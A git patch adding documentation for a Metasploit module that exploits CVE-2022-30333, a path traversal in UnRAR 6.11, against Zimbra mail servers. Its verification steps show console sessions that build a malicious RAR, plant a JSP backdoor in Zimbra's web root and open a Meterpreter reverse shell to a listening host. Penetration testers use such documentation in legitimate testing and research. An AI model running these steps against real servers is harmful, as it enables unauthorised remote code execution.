From 860cd38bbbe499bbd6b05e4b00887cff4b6306ee Mon Sep 17 00:00:00 2001 From: Ron Bowes Date: Tue, 26 Jul 2022 10:23:24 -0700 Subject: [PATCH] Add documentation --- .../linux/fileformat/unrar_cve_2022_30333.md | 117 ++++++++++++++++++ 1 file changed, 117 insertions(+) create mode 100644 documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md diff --git a/documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md b/documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md new file mode 100644 index 0000000000..f10f57ee45 --- /dev/null +++ b/documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md @@ -0,0 +1,117 @@ +## Vulnerable Application + +This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 and earlier (open source version 6.1.6 and earlier). You can get the vulnerable versions here: + +* [Vulnerable unRAR version](https://www.rarlab.com/rar/rarlinux-x64-611.tar.gz) +* [Github commit](https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946) + +Zimbra is included as a specific target, because certain Zimbra versions use `unrar` to scan incoming email. Specifically, the following versions of Zimbra are affected: + +* Zimbra Collaboration 9.0.0 Patch 24 (and earlier) +* Zimbra Collaboration 8.8.15 Patch 31 (and earlier) + +Installing the vulnerable versions of Zimbra is a pain, unfortunately. Currently, the following command works to downgrade Zimbra: + +``` +$ apt-get install zimbra-patch=8.8.15.1651873147.p31.1-1.u18 zimbra-mta-patch=8.8.15.1651844231.p31.1-1.u18 zimbra-proxy-patch=8.8.15.1651844231.p31.1-1.u18 +$ zmcontrol -v +Release 8.8.15.GA.3869.UBUNTU18.64 UBUNTU18_64 FOSS edition, Patch 8.8.15_P31.1. +``` + +Followed by specifically installing the vulnerable version of `unrar` linked above. Downpatching Zimbra like that is really finnicky, though, so that likely won't always work. + +## Verification Steps + +To exploit Zimbra: + +``` +msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333 +[*] Using configured payload linux/x64/meterpreter/reverse_tcp +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146 +LHOST => 10.0.0.146 +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set RHOSTS 10.0.0.154 +RHOSTS => 10.0.0.154 +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit + +[*] Started reverse TCP handler on 10.0.0.146:4444 +[*] Encoding the payload as a .jsp file +[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/sbrnabwujh.jsp +[+] payload.rar stored at /home/ron/.msf4/local/payload.rar +[+] File created! Email the file above to any user on the target Zimbra server +[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp... +[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp... +[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp... +[*] Sending stage (3020772 bytes) to 10.0.0.154 +[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/sbrnabwujh.jsp +[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.154:51664) at 2022-07-20 13:33:25 -0700 + +meterpreter > getuid +Server username: zimbra +``` + +To generate a generic .rar file: + +``` +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET 1 +TARGET => 1 +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH '../../../../../../../../../tmp' +TARGET_PATH => ../../../../../../../../../tmp +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_EXTENSION 'elf' +TARGET_EXTENSION => elf +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit + +[*] Target filename: ../../../../../../../../../tmp/hftb.elf +[+] payload.rar stored at /home/ron/.msf4/local/payload.rar +``` + +(then, in a shell with a vulnerable version of unrar) + +``` +ron@fedora ~/tools/unrar $ ./unrar x ~/.msf4/local/payload.rar +UNRAR 6.11 freeware Copyright (c) 1993-2022 Alexander Roshal + +Extracting from /home/ron/.msf4/local/payload.rar + +Extracting ZEnFEoDkBpQZ OK +Extracting ZEnFEoDkBpQZ OK +All OK +ron@fedora ~/tools/unrar $ file /tmp/hftb.elf +/tmp/hftb.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header +``` + +## Options + +### `FILENAME` + +The filename to generate + +### `TARGET_PATH` + +The path (traversal included) where the payload will extract to - eg, `../../../tmp/target.txt` + +### `TARGET_FILENAME` / `TARGET_EXTENSION` + +The filename and extension for the payload. + +The logic of both is: + +* We want to randomize the `TARGET_FILENAME`, but... +* The Zimbra exploit requires a `.jsp` extension to work + +To have a random filename but a specific extension, my best idea is to have two separate options. + +### `EncodeAsJsp` + +If set to `true`, encode the payload into .jsp format. This makes it possible to exploit Zimbra. + +### `ListenerTimeout` + +The number of seconds to wait for a new session (default = `0`, or infinite). + +### `CheckInterval` + +The frequency with which to check for the payload on the server. Every `CheckInterval`, it performs an HTTP request to the payload path. + +## Scenarios + +The most common examples are listed above in "Verification Steps".